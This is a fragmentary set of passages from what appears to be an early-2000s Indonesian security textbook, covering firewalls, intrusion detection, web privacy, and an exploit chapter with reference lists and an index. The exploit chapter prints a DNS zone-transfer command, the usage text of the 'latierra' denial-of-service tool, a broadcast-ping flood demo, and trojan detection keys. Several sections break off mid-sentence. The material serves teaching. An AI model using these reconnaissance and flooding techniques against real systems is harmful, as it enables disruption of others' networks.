untuk “telnet” dapat dibatasi untuk untuk sistem yang memiliki nomor IP
tertentu, atau memiliki domain tertentu. Sementara firewall dapat
digunakan untuk melakukan filter secara umum.
Firewall
Firewall merupakan sebuah perangkat yang diletakkan antara Internet
dengan jaringan internal (Lihat Figure 4.1 on page 65). Informasi yang
keluar atau masuk harus melalui firewall ini.
Internet Jaringan
Internal
Firewall
Tujuan utama dari firewall adalah untuk menjaga (prevent) agar akses (ke
dalam maupun ke luar) dari orang yang tidak berwenang (unauthorized
access) tidak dapat dilakukan. Konfigurasi dari firewall bergantung kepada
kebijaksanaan (policy) dari organisasi yang bersangkutan, yang dapat dibagi
menjadi dua jenis:
• apa-apa yang tidak diperbolehkan secara eksplisit dianggap tidak
diperbolehkan (prohibitted)
• apa-apa yang tidak dilarang secara eksplisit dianggap diperbolehkan
(permitted)
Firewall biasanya melakukan dua fungsi; fungsi (IP) filtering dan fungsi
proxy. Keduanya dapat dilakukan pada sebuah perangkat komputer (device)
atau dilakukan secara terpisah.
Satu hal yang perlu diingat bahwa adanya firewall bukan menjadi jaminan
bahwa jaringan dapat diamankan seratus persen. Firewall tersebut sendiri
dapat memiliki masalah. Sebagai contoh, Firewall Gauntlet yang dibuat
oleh Network Associates Inc. (NAI) mengalami masalah1 sehingga dapat
melewatkan koneksi dari luar yang seharusnya tidak boleh lewat. Padahal
Gauntlet didengung-dengungkan oleh NAI sebagai “The World’s Most
1. Tanggal 22 Mei 2000 ditemukan masalah dalam Gauntlet (versi 4.1, 4.2, 5.0, dan 5.5)
oleh Jim Stickley (seorang konsultan keamana dari Garrison Technologies) dimana jika
paket Cyber Patrol filtering dipasang, maka ada kemungkinan koneksi dari luar yang
seharusnya tidak boleh lewat firewall ternyata dilewatkan. Ternyata ada masalah “buffer
overflow” di server tersebut. Hal ini hanya terjadi jika Cyber Patrol diaktifkan. http://
www.securityfocus.com/news/40
Secure Firewall”. Inti yang ingin kami sampaikan adalah bahwa meskipun
sudah menggunakan firewall, keamanan harus tetap dipantau secara
berkala.
Ada berbagai cara untuk memantau adanya intruder. Ada yang sifatnya aktif
dan pasif. IDS cara yang pasif misalnya dengan memonitor logfile. Contoh
software IDS antara lain:
• Autobuse, mendeteksi probing dengan memonitor logfile.
• Courtney dan portsentry, mendeteksi probing (port scanning) dengan
memonitor packet yang lalu lalang. Portsentry bahkan dapat
memasukkan IP penyerang dalam filter tcpwrapper (langsung
dimasukkan kedalam berkas /etc/hosts.deny)
• Shadow dari SANS
• Snort, mendeteksi pola (pattern) pada paket yang lewat dan
mengirimkan alert jika pola tersebut terdeteksi. Pola-pola atau rules
disimpan dalam berkas yang disebut library yang dapat dikonfigurasi
sesuai dengan kebutuhan.
direktori yang ingin kita amati beserta “signature” dari berkas tersebut.
Signature berisi informasi mengenai besarnya berkas, kapan dibuatnya,
pemiliknya, hasil checksum atau hash (misalnya dengan menggunakan
program MD5), dan sebagainya. Apabila ada perubahan pada berkas
tersebut, maka keluaran dari hash function akan berbeda dengan yang ada di
database sehingga ketahuan adanya perubahan.
Letak dan isi dari berkas log bergantung kepada operating system yang
digunakan. Di sistem berbasis UNIX, biasanya berkas ini berada di direktori
/var/adm atau /var/log. Contoh berkas log yang ada di sistem Linux
Debian dapat dilihat pada Table 5 on page 68.
Sebagai contoh, berikut ini adalah cuplikan baris isi dari berkas /var/adm/
auth.log:
Apr 8 08:47:12 xact passwd[8518]: password for `inet' changed
by root
Apr 8 10:02:14 xact su: (to root) budi on /dev/ttyp3
^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^
P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
host=vhost.txg.wownet.net
Contoh di atas menunjukkan hal yang sedikit aneh dari akses ke servis
email melalui IMAP (ditunjukkan dengan kata “imapd” yang merupakan
server dari servis IMAP). Pertama, user yang digunakan tidak valid. Kedua,
kebetulan administrator tidak memiliki remote user yang berasal dari host
yang disebut di atas. Setelah diselidiki, ternyata memang ada lubang
keamanan dari implementasi “imapd” yang digunakan. Ini diketahui
setelah melihat informasi yang ada di web site CERT (See “Sumber
informasi dan organisasi yang berhubungan dengan keamanan sistem
informasi” on page 116.). Untuk itu administrator cepat-cepat menutup
servis imap tersebut, mengambil dan memasang versi baru dari imapd yang
tidak memiliki lubang keamanan tersebut.
Untuk sistem yang sangat esensial, secara berkala perlu dibuat backup yang
letaknya berjauhan secara fisik. Hal ini dilakukan untuk menghindari
hilangnya data akibat bencana seperti kebakaran, banjir, dan lain
sebagainya. Apabila data-data dibackup akan tetapi diletakkan pada lokasi
yang sama, kemungkinan data akan hilang jika tempat yang bersangkutan
mengalami bencana seperti kebakaran.
World Wide Web (WWW atau Web1) merupakan salah satu “killer
applications” yang menyebabkan populernya Internet. WWW
dikembangkan oleh Tim Berners-Lee ketika bekerja di CERN (Swiss).
Sejarah dari penemuan ini dapat dibaca pada buku karangan Tim Berners-
Lee ini [3]. Kehebatan Web adalah kemudahannya untuk mengakses
informasi, yang dihubungkan satu dengan lainnya melalui konsep hypertext.
Informasi dapat tersebar di mana-mana di dunia dan terhubung melalui
hyperlink. Informasi lebih lengkap tentang WWW dapat diperoleh di web
W3C <http://www.w3.org>.
Pembaca atau peraga sistem WWW yang lebih dikenal dengan istilah
browser dapat diperoleh dengan mudah, murah atau gratis. Contoh browser
adalah Netscape, Internet Explorer, Opera, kfm (KDE file manager di
sistem Linux), dan masih banyak lainnya. Kemudahan penggunaan program
browser inilah yang memicu populernya WWW. Sejarah dari browser ini
dimulai dari browser di sistem komputer NeXT yang kebetulan digunakan
oleh Berners-Lee. Selain browser NeXT itu, pada saat itu baru ada browser
yang berbentuk text (text-oriented) seperti “line mode” browser. Kemudian
1. Untuk selanjutnya penggunaan kata WWW atau Web akan dianggap sama.
ada lynx dan akhirnya muncul Mosaic yang dikembangkan oleh Marc
Andreesen beserta kawan-kawannya ketika sedang magang di NCSA.
Mosaic yang multi-platform (Unix/Xwindow, Mac, Windows) inilah yang
memicu popularitas WWW.
Arsitektur sistem Web terdiri dari dua sisi: server dan client. Keduanya
dihubungkan dengan jaringan komputer (computer network). Selain
menyajikan data-data dalam bentuk statis, sistem Web dapat menyajikan
data dalam bentuk dinamis dengan menjalankan program. Program ini
dapat dijalankan di server (misal dengan CGI, servlet) dan di client (applet,
Javascript). Sistem server dan client memiliki permasalahan yang berbeda.
Keduanya akan dibahas secara terpisah.
Ada asumsi dari sistem Web ini. Dilihat dari sisi pengguna:
• Server dimiliki dan dikendalikan oleh organisasi yang mengaku
memiliki server tersebut. Maksudnya, jika sebuah server memiliki
domain www.bni.co.id dan tulisan di layar menunjukkan bahwa situs itu
merupakan milik Bank BNI maka kita percaya bahwa server tersebut
memang benar milik Bank BNI. Adanya domain yang dibajak
merupakan anomali terhadap asumsi ini.
• Dokumen yang ditampilkan bebas dari virus, trojan horse, atau itikad
jahat lainnya. Bisa saja seorang yang nakal memasang virus di web nya.
Akan tetapi ini merupakan anomali.
• Server tidak mendistribusikan informasi mengenai pengunjung (user
yang melakukan browsing) kepada pihak lain. Hal ini disebabkan ketika
kita mengunjungi sebuah web site, data-data tentang kita (nomor IP,
operating system, browser yang digunakan, dll.) dapat dicatat.
Pelanggaran terhadap asumsi ini sebetulnya melanggar privacy. Jika hal
ini dilakukan maka pengunjung tidak akan kembali ke situs ini.
Server WWW menyediakan fasilitas agar client dari tempat lain dapat
mengambil informasi dalam bentuk berkas (file), atau mengeksekusi
perintah (menjalankan program) di server. Fasilitas pengambilan berkas
dilakukan dengan perintah “GET”, sementara mekanisme untuk
1. Mekanisme ini juga berlaku di server yang menggunakan program NCSA httpd dan
CERN httpd.
</Limit>
Selain server WWW dari Netscape, beberapa server lain juga memiliki
fasilitas SSL juga. Server WWW Apache (yang tersedia secara gratis) dapat
dikonfigurasi agar memiliki fasilitas SSL dengan menambahkan software
tambahan (SSLeay - yaitu implementasi SSL dari Eric Young - atau
OpenSSL1 - yaitu implementasi Open Source dari SSL). Bahkan ada sebuah
perusahaan (Stronghold) yang menjual Apache dengan SSL.
Oleh karena hal di atas, implementasi SSLeay Eric Young tidak dapat
digunakan di Amerika Utara (Amerika dan Kanada) karena “melanggar”
paten RSA dan RC4 yang digunakan dalam implementasinya. SSLeay
dapat diperoleh dari:
• http://www.psy.uq.oz.au/~ftp/Crypto
Pelanggaran Privacy
Ketika kita mengunjungi sebuah situs web, browser kita dapat “dititipi”
sebuah “cookie” yang fungsinya adalah untuk menandai kita. Ketika kita
berkunjung ke server itu kembali, maka server dapat mengetahui bahwa kita
kembali dan server dapat memberikan setup sesuai dengan keinginan
(preference) kita. Ini merupakan servis yang baik. Namun data-data yang
sama juga dapat digunakan untuk melakukan tracking kemana saja kita
pergi.
Ada juga situs web yang mengirimkan script (misal Javascript) yang
melakukan interogasi terhadap server kita (melalui browser) dan
mengirimkan informasi ini ke server. Bayangkan jika di dalam komputer
kita terdapat data-data yang bersifat rahasia dan informasi ini dikirimkan ke
server milik orang lain.
Bahan Bacaan
Informasi lebih lanjut mengenai keamanan sistem WWW dapat diperoleh
dari sumber on-line sebagai berikut.
• <http://www.w3.org/Security/Faq/>
• Nalneesh Gaur, “Assessing the Security of Your Web Applications,”
Linux Journal, April 2000, hal. 74-78.
• Netscape’s cookie Security FAQ
http://search.netscape.com/assist/security/faqs/cookies.html
Dalam bab ini akan dibahas beberapa contoh eksploitasi lubang keamanan.
Contoh-contoh yang dibahas ada yan bersifat umum dan ada yang bersifat
khusus untuk satu jenis operating system tertentu, atau untuk program
tertentu dengan versi tertentu. Biasanya lubang keamanan ini sudah ditutup
pada versi baru dari paket program tersebut sehingga mungkin tidak dapat
anda coba. Pembahasan dalam bab ini tentunya tidak komplit dikarenakan
batasan jumlah halaman. Jika diinginkan pembahasan yang lebih komplit
ada buku “Hacking Exposed” (lihat referensi [36]) yang dapat digunakan
untuk keperluan tersebut.
Mencari informasi
Sebelum melakukan penyerangan, seorang cracker biasanya mencari
informasi tentang targetnya. Banyak informasi tentang sebuah sistem yang
dapat diperoleh dari Internet. Sebagai contoh, informasi dari DNS (Domain
Name System) kadang-kadang terlalu berlebihan sehingga memberikan
terlalu banyak informasi kepada orang yang bermaksud jahat. DNS dapat
memberikan informasi tentang nama-nama server berserta nomor IP yang
dimiliki oleh sebuah perusahaan. Seseorang yang tidak tahu apa-apa,
dengan mengetahui domain dari sebuah perusahaan dapat mengetahui
informasi yang lebih banyak tentang server-server dari perusahaan tersebut.
Paling tidak, informasi tentang name server merupakan informasi awal
yang dapat berguna.
Informasi tentang DNS tersedia secara terbuka di Internet dan dapat dicari
dengan menggunakan berbagai tools seperti:
• whois, host, nslookup, dig (tools di sistem UNIX)
• Sam Spade (tools di sistem Windows)
• web dari Network Solutions inc. yang menyediakan informasi tentang
data-data gTLD (.com, .net, .org, dan seterusnya) melalui webnya di
http://www.networksolutions.com
Berikut ini adalah contoh beberapa session untuk mencari informasi tentang
domain dan server-server yang digunakan oleh domain tersebut. Untuk
mencari name server, dapat digunakan program “host” dengan option “-t
ns”. Sementara itu untuk mencari nomor IP dari sebuah host, langsun
gunakan program host tanpa option.
unix$ host -t ns yahoo.com
yahoo.com NS NS3.EUROPE.yahoo.com
yahoo.com NS NS1.yahoo.com
yahoo.com NS NS5.DCX.yahoo.com
Registrant:
Yahoo (YAHOO-DOM)
3420 Central Expressway
Santa Clara, CA 95051
US
NS1.YAHOO.COM 204.71.200.33
NS5.DCX.YAHOO.COM 216.32.74.10
NS3.EUROPE.YAHOO.COM 217.12.4.71
dengan istilah zone transfer. Program “dig” dapat kita gunakan untuk
keperluan tersebut.
unix$ dig yahoo.com. axfr @ns1.yahoo.com.
Untuk sistem yang diamankan secara baik, perintah zone transfer di atas
akan gagal untuk dilakukan. Akan tetapi untuk sistem yang tidak baik,
perintah di atas akan memberikan informasi tentang nama server-server
yang berada dalam domain tersebut. Termasuk server di Intranet! (seperti
billing, terminal server, RAS, dan sebagainya). Informasi yang sensitif
seperti ini seharusnya tidak dapat di-query oleh orang atau server yang tidak
berhak. Query zone transfer ini juga dapat dijadikan DoS attack karena
dengan query yang sedikit (berdasarkan jumlah dan ukuran paket yang
dikirimkan) dia menghasilkan jawaban yang cukup panjang. Dengan kata
lain terjadi amplifikasi dari penggunaan bandwidth jaringan. Periksa sistem
anda apakah DNS anda sudah dikelola dengan baik atau masih terbuka
untuk zone transfer.
Selain itu, serangan DoS sering digunakan sebagai bagian dari serangan
lainnya. Misalnya, dalam serangan IPspoofing (seolah serangan datang dari
tempat lain dengan nomor IP milik orang lain), seringkali DoS digunakan
untuk membungkam server yang akan dispoof.
Land attack
Land attack merupakan serangan kepada sistem dengan menggunakan
program yang bernama “land”. Apabila serangan diarahkan kepada sistem
Windows 95, maka sistem yang tidak diproteksi akan menjadi hang (dan
bisa keluar layar biru). Demikian pula apabila serangan diarahkan ke
beberapa jenis UNIX versi lama, maka sistem akan hang. Jika serangan
diarahkan ke sistem Windows NT, maka sistem akan sibuk dengan
penggunaan CPU mencapai 100% untuk beberapa saat sehingga sistem
terlihat seperti macet. Dapat dibayangkan apabila hal ini dilakukan secara
Latierra
Program latierra merupakan “perbaikan” dari program land, dimana port
yang digunakan berubah-ubah sehingga menyulitkan bagi pengamanan.
latierra v1.0b by MondoMan (elmondo@usa.net), KeG
Enhanced version of land.c originally developed by m3lt, FLC
Arguments:
* -i dest_ip = destination ip address such as 1.1.1.1
If last octet is '-', then the address will increment
from 1 to 254 (Class C) on the next loop
and loop must be > 1 or -5 (forever).
Alternatives = zone=filename.txt or list=filename.txt
(ASCII) For list of alternative options,
use -a instead of -h.
* -b port# = beginning port number (required).
-e port# = ending port number (optional)
-t = tcp flag options (f=fin, ~s=syn, r=reset, ~p=push, a=ack,
u=urgent)
-v = time_to_live value, default=255
-p protocol = ~6=tcp, 17=udp, use -p option for complete list
-w window_size = value from 0 to ?, default=65000
-q tcp_sequence_number, default=3868
-m message_type
(~0=none, 1=Out-Of-Band, 4=Msg_DontRoute
-s seconds = delay between port numbers, default=1
-o 1 = supress additional output to screen, default=0
-l loop = times to loop through ports/scan, default=1,
-5=forever
* = required ~ = default parameter values
Ping-o-death
Salah satu mekanisme serangan yang baru-baru ini mulai marak digunakan
adalah menggunakan ping ke alamat broadcast, ini yang sering disebut
dengan smurf. Seluruh komputer (device) yang berada di alamat broadcast
tersebut akan menjawab. Apakah ini merupakan standar?
Jika sebuah sistem memiliki banyak komputer (device) dan ping broadcast
ini dilakukan terus menerus, jaringan dapat dipenuhi oleh respon-respon
dari device-device tersebut. Akibatnya jaringan menjadi lambat.
$ ping 192.168.1.255
PING 192.168.1.255 (192.168.1.255): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms
64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms
(DUP!)
--- 192.168.1.255 ping statistics ---
4 packets transmitted, 4 packets received, +4 duplicates, 0%
packet loss
round-trip min/avg/max = 2.5/6.0/24.0 ms
Sniffer
Program sniffer adalah program yang dapat digunakan untuk menyadap
data dan informasi melalui jaringan komputer. Di tangan seorang admin,
program sniffer sangat bermanfaat untuk mencari (debug) kesalahan di
jaringan atau untuk memantau adanya serangan. Di tangan cracker, program
sniffer dapat digunakan untuk menyadap password (jika dikirimkan dalam
bentuk clear text).
Sniffit
Program sniffit dijalankan dengan userid root (atau program dapat di-setuid
root sehingga dapat dijalankan oleh siapa saja) dan dapat menyadap data.
Untuk contoh penggunaan sniffit, silahkan baca dokumentasi yang
menyertainya. (Versi berikut dari buku ini akan menyediakan informasi
tentang penggunaannya.)
tcpdump
Program tcpdump merupakan program gratis yang umum digunakan untuk
menangkap paket di sistem UNIX. Implementasi untuk sistem Window juga
tersedia dengan nama windump. Setelah ditangkap, data-data (paket) ini
dapat diolah dengan program lainnya, seperti dengan menggunakan
program tcpshow, tcptrace, dan sejenisnya.
Richard Stevens [41] yang sangat terkenal atau buku “Network Intrusion
Detection” [28]. Berikut ini adalah contoh sebuah sesi tcpdump.
unix# tcpdump
06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: S
616175183:616175183(0) win 5840 <mss 1460,nop,nop,sackOK> (DF)
06:46:31.318893 192.168.1.1.80 > 192.168.1.7.1043: S
1312015909:1312015909(0) ack 616175184 win 32736 <mss 1460>
06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: . ack 1 win
5840 (DF)
06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: P
1:296(295) ack 1 win 5840 (DF)
06:46:31.338893 192.168.1.1.80 > 192.168.1.7.1043: . ack 296
win 32441 (DF)
06:46:31.738893 192.168.1.1.80 > 192.168.1.7.1043: P
1:200(199) ack 296 win 32736 (DF)
06:46:31.868893 192.168.1.7.1043 > 192.168.1.1.80: . ack 200
win 5641 (DF)
06:46:31.898893 192.168.1.1.1492 > 192.168.1.7.113: S
2035772989:2035772989(0) win 512 <mss 1460>
06:46:31.898893 192.168.1.7.113 > 192.168.1.1.1492: R 0:0(0)
ack 2035772990 win 0
06:46:39.028893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:39.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:40.028893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:40.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:41.028893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:41.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:42.038893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:42.038893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:44.048893 192.168.1.7.1043 > 192.168.1.1.80: P
296:591(295) ack 200 win 5641 (DF)
06:46:44.048893 192.168.1.1.80 > 192.168.1.7.1043: P
200:398(198) ack 591 win 32736 (DF)
Selain sesi web, nampak juga sesi ping dimana ada paket “ICMP echo
request” yang dibalas dengan paket “ICMP echo reply”. Ping ini juga
dikirimkan dari IP 192.168.1.7 ke komputer dengan IP 192.168.1.1.
Sniffer Pro
Sniffer Pro merupakan program sniffer komersial yang berjalan di sistem
Windows. Program ini dibuat oleh Network Associates dan cukup lengkap
fasilitasnya. Sniffer Pro dapat menangkap packet dengan aturan-aturan
(rules) tertentu. Bahkan dia dilengkapi dengan visualisasi yang sangat
menarik dan membantu administrator.
Anti Sniffer
Untuk menutup lubang keamanan dari kegiatan sniffing, administrator
dapat membuat jaringannya bersegmen dan menggunakan perangkat switch
sebagai pengganti hub biasa. Selain itu dapat juga digunakan program untuk
mendeteksi adanya penggunaan sniffer di jaringan yang dikelolanya.
Program pendeteksi sniffer ini disebut anti-sniffer.
Trojan Horse
Back Orifice (BO) merupakan trojan horse untuk sistem yang menggunakan
operating system Windows (95, 98, NT, 2000). BO Merupakan produk dari
Cult of the Dead Cow, pertama kali dikeluarkan 3 Agustus 1998 dan sangat
populer di kalangan bawah tanah. Pada saat dokumen ini ditulis, telah
keluar BO 2000 untuk sistem operasi Windows 2000.
BO terdiri dari server (yang dipasang atau disisipkan di komputer target)
dan client (yang digunakan untuk mengendalikan server). Akses ke server
BO dapat diproteksi dengan menggunakan password sehingga
mengecohkan atau membatasi akses oleh orang lain.
Dengan menggunakan BO, intruder dapat mengirimkan pesan seperti:
Mendeteksi BO
Gunakan program "REGEDIT" dan cari
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
RunServices
Jika variabel tersebut berisi, maka anda sudah terkena BO. Catatan: nama
file adalah space-dot-exe. Cek di direktory "Windows\SYSTEM\" jika ada
nama file yang kosong atau titik, dan ukurannya (sama dengan atau lebih
besar dari) 122KB, kemungkinan itu BO. File tersebut tidak dapat dihapus
begitu saja.
• http://www.iss.net/xforce/alerts/advise5.html
NetBus
NetBus merupakan trojan horse yang mirip Back Orifice. NetBus dapat
digunakan untuk mengelola komputer Windows 95/98/NT dari jarak jauh
untuk mengakses data dan fungsi dari komputer tersebut. NetBus terdiri
dari client dan server. Versi 1.60 dari NetBus server adalah Windows PE file
yang bernama PATCH.EXE. Jika dia terpasang (installed) maka dia akan
langsung dijalankan ketika komputer di"StartUp".
Eksekusi dari server ada di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Run
The larger point to remember is that laws must be written in relation to actions, not
technology.
-- Tim Berners-Lee, inventor of WWW in "Weaving the Web"
[Bagian ini akan saya perbaiki lagi mengingat sudah banyak informasi
mengenai cyberlaw di Indonesia. Saya sendiri ikut terlibat dalam
penyusunan cyberlaw ini.]
Internet menghilangkan batas tempat dan waktu, dua asas yang cukup
esensial di bidang hukum. Dimanakah batas teritori dari cyberlaw? Untuk
Privacy
Aspek privacy sering menjadi masalah yang berkaitan dengan masalah
keamanan. Pemakai (user) umumnya ingin informasi dan kegiatan yang
dilakukannya tidak diketahui oleh orang lain, termasuk oleh administrator.
Sistem wireless mulai populer. Hal ini dimulai dengan maraknya cellular
phone (handphone) di dunia yang pada mulanya hanya memberikan akses
voice. Kemudian handphone dapat pula digunakan untuk mengirimkan
data. Sebagai catatan, jumlah pengguna handphone di dunia (selain di
Amerika Utara) sudah mengalahkan jumlah pengguna Internet. Di
Indonesia sendiri, saat ini terdapat lebih dari 4 juta pelanggan handphone
sementara hanya ada 1,5 juta pengguna Internet. Dengan kata lain,
handphone lebih merasuk daripada Internet yang menggunakan jaringan
yang fixed (wired).
Di sisi lain perangkat komputer mulai muncul dalam ukuran yang kecil dan
portable. Personal Digital Assistant (PDA) seperti Palm, Handspring,
Symbian, Windows CE mulai banyak digunakan orang. Perangkat ini
Kelihatannya akan ada konvergensi dari teknologi wireless dan juga dari
perangkat pengakses informasi ini. Siapa pemenangnya? masih terlalu dini
untuk diputuskan.
Bahan Bacaan
1. Steve Steinke, “Security and 802.11 Wireless Networks,” Network
Computing Asia, Aug, 2002. pp. 46-47.
2. Unofficial 802.11 Security Web page: www.drizzle.com/~aboba/IEEE
3. Nikita Borisov, Ian Goldberg, and David Wagner, “Intercepting Mobile
Communications: The Insecurity of 802.11”. Juga dapat diperoleh dari
www.isaac.cs.berkeley.edu/isaac/mobicom.pdf
36. Joel Scambray, Stuart McClure, and George Kurtz, “Hacking Exposed:
Network Security Secrets and Solutions,” first and second edition,
McGraw-Hill, 2001.
14. NEC
ftp://ftp.nec.com/pub/security
15. OpenSec.Net
http://www.opensec.net
Berisi koleksi software tools yang berhubungan dengan masalah keama-
man. Saat ini lebih uptodate daripada Rootshell.
16. Packet Storm
http://www.packetstormsecurity.org
(dahulu bernama http://packetstorm.securify.com)
Berisi koleksi software yang berhubungan dengan security.
17. RISK: Electronic Digest
http://catless.ncl.ac.uk/Risks
18. Rootshell
http://www.rootshell.com
http://rootshell.connectnet.com/docs/
Berisi informasi terbaru tentang lubang keamanan, program-program
yang dapat digunakan untuk menguji atau eksploitasi keamanan, dan
juga menyimpan tulisan (makalah, tutorial, artikel, dsb.) tentang sistem
keamanan. Catatan: saat ini web ini sudah jarang diupdate (mati)
19. SANS
http://www.sans.org
20. Securiteam.com
http://www.securiteam.com
Breaking news tentang security hole, tools.
21. Security Focus
http://www.securityfocus.com
Informasi, paper, tools.
22. Security Portal
http://www.securityportal.com/
Berisi artikel dan berita yang berhubungan dengan keamaman.
23. TAMU
ftp://net.tamu.edu/pub/security
24. Technotronic: menyediakan koleksi tools (ftp site), makalah, dokumen-
tasi, advisories, cukup up to date
http://www.technotronic.com
K R
Kecoa Elektronik 25 RISK 118
key escrow 105 Rootshell 47
klikBCA 17 ROT13 31
RSA 72, 78, 103, 104
L
land 47, 89 S
latierra 47, 90 Sam Spade 86
libpcap 120 SANS 118
Linux Debian 64, 68 SBScan 47, 120
Secure Socket Layer 78
M sendmail 8, 68
MD5 41 setuid 46
Modification 19 SHA 41
Morris 8 Shadow 120
SirCam 7
N smart card 17
NetBus 98 SMTP 48
netdiag 57 smurf 91
NetLab 53 sniffer 15, 56
netwatch 57 Sniffit 93
nmap 45, 55, 120 sniffit 56
ntop 57, 120 SNMP 56
Socks 66
O Squid 66, 121
Ogre 53, 79 SSH 72
OpenSSL 78, 120 SSL 78
SSLeay 79, 120
P Stallings 18
password 60 Statistik Sistem Keamanan 5
Password, shadow 62 stream cipher 29
pau-mikro 25 strobe 52
Perl 32 Stronghold 78
PGP 36 SunOS 64
ping-o-death 47 syslog 54, 68
plaintext 28
T W
tcpd 64 WebXRay 56
tcpdump 56, 93 whois 85
tcplogd 54, 121 Windows 95 89
tcpprobe 52 windump 93
tcpwrapper 64 winuke 47
tftp 88 Wordstar 12
TLS 120 wu-ftpd 69
trafshow 57
Tripwire 47, 67 Z
Trojan Horse 95 zone transfer 86
trojan horse 16